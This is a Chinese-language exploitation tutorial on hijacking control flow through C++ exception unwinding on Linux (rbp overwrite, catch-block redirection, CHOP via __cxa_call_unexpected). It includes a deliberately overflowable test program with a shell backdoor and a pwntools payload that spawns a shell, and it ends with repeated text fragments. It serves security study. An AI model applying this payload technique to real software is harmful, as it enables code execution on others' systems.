Linux下C++异常处理溢出漏洞攻击手法研究<\/h1>

1. 异常处理基础与漏洞背景<\/h2>
本文研究Linux环境下C++基于eh_frame进行unwind的异常处理流程中的攻击手法。异常处理在不同操作系统和语言实现差异较大，本文专注于通过异常处理利用溢出漏洞的技术。<\/p>

关键特性：<\/h3>

异常抛出后不会执行发生异常所在函数的剩余部分（包括ret指令）<\/li>
传统基于ret指令的ROP攻击在异常处理场景下失效<\/li>

异常处理流程绕过了canary等栈保护机制<\/li> <\/ul>

2. 简单控制流劫持技术<\/h2>

2.1 示例代码分析<\/h3>

#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <unistd.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>class<\/span> x<\/span> {
<\/span><\/span>public<\/span>:<\/span>
<\/span><\/span>    char<\/span> buf[0x10<\/span>];
<\/span><\/span>    x(void<\/span>) { printf("x:x() called<\/span>\n<\/span>"<\/span>); }
<\/span><\/span>    ~<\/span>x(void<\/span>) { printf("x:~x() called<\/span>\n<\/span>"<\/span>); }
<\/span><\/span>};
<\/span><\/span>
<\/span><\/span>void<\/span> test<\/span>() {
<\/span><\/span>    x a;
<\/span><\/span>    int<\/span> cnt =<\/span> 0x100<\/span>;
<\/span><\/span>    size_t len =<\/span> read(0<\/span>, a.buf, cnt);
<\/span><\/span>    if<\/span>(len ><\/span> 0x10<\/span>) {
<\/span><\/span>        throw<\/span> "Buffer overflow"<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    try<\/span> {
<\/span><\/span>        test();
<\/span><\/span>        throw<\/span> 1<\/span>;
<\/span><\/span>    } catch<\/span>(int<\/span> x) {
<\/span><\/span>        printf("Int: %d<\/span>\n<\/span>"<\/span>, x);
<\/span><\/span>    } catch<\/span>(const<\/span> char<\/span>*<\/span> s) {
<\/span><\/span>        printf("String: %s<\/span>\n<\/span>"<\/span>, s);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.2 两种基本攻击手法<\/h3>
手法1：覆盖rbp控制程序流<\/h4>

原理<\/strong>：异常处理结束后使用leave; ret<\/code>指令，ret地址为[rbp+8]<\/code><\/li>
利用条件<\/strong>：程序使用rbp存储栈帧（非rsp直接增减方式）<\/li>
利用步骤<\/strong>：

覆盖rbp为可控地址（如GOT表地址）<\/li>
在[rbp+8]<\/code>处放置目标地址<\/li>
异常处理结束后跳转到目标地址<\/li>
<\/ol>
<\/li>
<\/ul>
手法2：覆盖ret地址改变异常处理流程<\/h4>

原理<\/strong>：修改返回地址使异常被另一个函数的catch块处理<\/li>
利用条件<\/strong>：目标函数有合适的catch块<\/li>
利用步骤<\/strong>：

识别目标catch块地址范围<\/li>
覆盖返回地址为目标try块范围内的地址<\/li>
确保异常类型与catch块匹配<\/li>
<\/ol>
<\/li>
<\/ul>
3. CHOP (Catch Handler Oriented Programming)<\/h2>
3.1 Golden Gadget原理<\/h3>
在libstdc++中存在关键代码片段：<\/p>
void<\/span> __cxa_call_unexpected<\/span>(void<\/span>*<\/span> exc_obj_in) {
<\/span><\/span>    xh_terminate_handler =<\/span> xh-><\/span>terminateHandler;
<\/span><\/span>    try<\/span> {
<\/span><\/span>        \/* ... *\/<\/span>
<\/span><\/span>    } catch<\/span>(...) {
<\/span><\/span>        __terminate(xh_terminate_handler);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>void<\/span> __terminate<\/span>(void<\/span> (*<\/span>handler)()) throw<\/span>() {
<\/span><\/span>    handler();
<\/span><\/span>    std::<\/span>abort();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>通过控制xh_terminate_handler<\/code>可实现任意函数调用。<\/p>
3.2 现代libstdc++实现变化<\/h3>
在较新版本(如Ubuntu 22.04)中，调用链变为：<\/p>
__cxa_call_unexpected() 
→ __cxa_call_unexpected.cold() 
→ __terminate()
<\/code><\/pre>
关键变化：<\/p>

handler从寄存器r12获取而非局部变量<\/li>
需要控制执行流进入正确分支避免crash<\/li>
<\/ul>
3.3 利用.eh_frame控制寄存器<\/h3>
通过分析.eh_frame段信息（使用readelf -wF<\/code>），可以找到寄存器与栈的关联关系：<\/p>
LOC           CFA      rbx rbp r12 r13 r14 r15 ra
00000000004027e0 rsp+8 u    u   u   u   u   u  c-8
00000000004027e6 rsp+16 u   u   u   u   u  c-16 c-8
...
<\/code><\/pre>
选择rsp+8且能设置r12寄存器的条目，通过栈溢出控制寄存器值。<\/p>
4. 完整利用示例<\/h2>
4.1 测试代码<\/h3>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <unistd.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>class<\/span> x<\/span> {
<\/span><\/span>public<\/span>:<\/span>
<\/span><\/span>    char<\/span> buf[0x10<\/span>];
<\/span><\/span>    x(void<\/span>) { printf("x:x() called<\/span>\n<\/span>"<\/span>); }
<\/span><\/span>    ~<\/span>x(void<\/span>) { printf("x:~x() called<\/span>\n<\/span>"<\/span>); }
<\/span><\/span>};
<\/span><\/span>
<\/span><\/span>void<\/span> backdoor<\/span>() {
<\/span><\/span>    system("\/bin\/sh"<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>void<\/span> test<\/span>() {
<\/span><\/span>    x a;
<\/span><\/span>    int<\/span> cnt =<\/span> 0x100<\/span>;
<\/span><\/span>    size_t len =<\/span> read(0<\/span>, a.buf, cnt);
<\/span><\/span>    if<\/span>(len ><\/span> 0x10<\/span>) {
<\/span><\/span>        throw<\/span> "Buffer overflow"<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    try<\/span> {
<\/span><\/span>        test();
<\/span><\/span>        throw<\/span> 1<\/span>;
<\/span><\/span>    } catch<\/span>(int<\/span> x) {
<\/span><\/span>        printf("Int: %d<\/span>\n<\/span>"<\/span>, x);
<\/span><\/span>    } catch<\/span>(const<\/span> char<\/span>*<\/span> s) {
<\/span><\/span>        printf("String: %s<\/span>\n<\/span>"<\/span>, s);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.2 利用步骤<\/h3>


定位关键地址：<\/p>

__cxa_call_unexpected()<\/code>的try块起始地址<\/li>
后门函数地址<\/li>
合适的.eh_frame条目地址<\/li>
<\/ul>
<\/li>

构造payload：<\/p>

填充缓冲区<\/li>
设置防止crash的局部变量<\/li>
放置.eh_frame条目地址+1（对齐）<\/li>
放置Golden Gadget的try块地址+1<\/li>
<\/ul>
<\/li>

触发异常处理流程<\/p>
<\/li>
<\/ol>
4.3 利用代码(Python)<\/h3>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context.<\/span>log_level =<\/span> 'debug'<\/span>
<\/span><\/span>context.<\/span>arch =<\/span> 'amd64'<\/span>
<\/span><\/span>context.<\/span>os =<\/span> 'linux'<\/span>
<\/span><\/span>
<\/span><\/span>io =<\/span> process('.\/pwn'<\/span>)
<\/span><\/span>
<\/span><\/span>backdoor =<\/span> 0x401a7d<\/span>
<\/span><\/span>io.<\/span>recvuntil("called"<\/span>)
<\/span><\/span>
<\/span><\/span>payload =<\/span> b<\/span>'a'<\/span>*<\/span>8<\/span>
<\/span><\/span>payload +=<\/span> b<\/span>'b'<\/span>*<\/span>8<\/span>
<\/span><\/span>payload +=<\/span> b<\/span>'c'<\/span>*<\/span>8<\/span>
<\/span><\/span>payload +=<\/span> p64(0xff<\/span>)       # 防crash<\/span>
<\/span><\/span>payload +=<\/span> p64(backdoor)   # 目标地址<\/span>
<\/span><\/span>payload +=<\/span> p64(0x4a6001<\/span>)   # 防crash<\/span>
<\/span><\/span>payload +=<\/span> b<\/span>'g'<\/span>*<\/span>8<\/span>
<\/span><\/span>payload +=<\/span> p64(0x004032a4<\/span> +<\/span> 1<\/span>)  # .eh_frame条目<\/span>
<\/span><\/span>payload +=<\/span> p64(0x402df0<\/span> +<\/span> 1<\/span>)    # Golden Gadget地址<\/span>
<\/span><\/span>
<\/span><\/span>io.<\/span>send(payload)
<\/span><\/span>io.<\/span>interactive()
<\/span><\/span><\/code><\/pre>5. 防御建议<\/h2>

加强栈溢出防护（如加强canary保护）<\/li>
限制异常处理中的敏感操作<\/li>
及时更新libstdc++等关键库<\/li>
使用现代编译防护技术（如CFI）<\/li>
对异常处理流程进行安全审计<\/li>
<\/ol>
6. 扩展研究方向<\/h2>

与传统ROP技术的结合利用<\/li>
与Sigreturn的配合攻击<\/li>
其他语言运行时异常处理机制的漏洞研究<\/li>
不同libstdc++版本间的差异分析<\/li>
<\/ol>

Linux下C++异常处理溢出漏洞攻击手法研究<\/h1>

1. 异常处理基础与漏洞背景<\/h2> 本文研究Linux环境下C++基于eh_frame进行unwind的异常处理流程中的攻击手法。异常处理在不同操作系统和语言实现差异较大，本文专注于通过异常处理利用溢出漏洞的技术。<\/p>

2. 简单控制流劫持技术<\/h2>

2.2 两种基本攻击手法<\/h3>

3. CHOP (Catch Handler Oriented Programming)<\/h2>

4. 完整利用示例<\/h2>

6. 扩展研究方向<\/h2> 与传统ROP技术的结合利用<\/li> 与Sigreturn的配合攻击<\/li> 其他语言运行时异常处理机制的漏洞研究<\/li> 不同libstdc++版本间的差异分析<\/li> <\/ol>

1. 异常处理基础与漏洞背景<\/h2>
本文研究Linux环境下C++基于eh_frame进行unwind的异常处理流程中的攻击手法。异常处理在不同操作系统和语言实现差异较大，本文专注于通过异常处理利用溢出漏洞的技术。<\/p>

6. 扩展研究方向<\/h2>

与传统ROP技术的结合利用<\/li>
与Sigreturn的配合攻击<\/li>
其他语言运行时异常处理机制的漏洞研究<\/li>
不同libstdc++版本间的差异分析<\/li> <\/ol>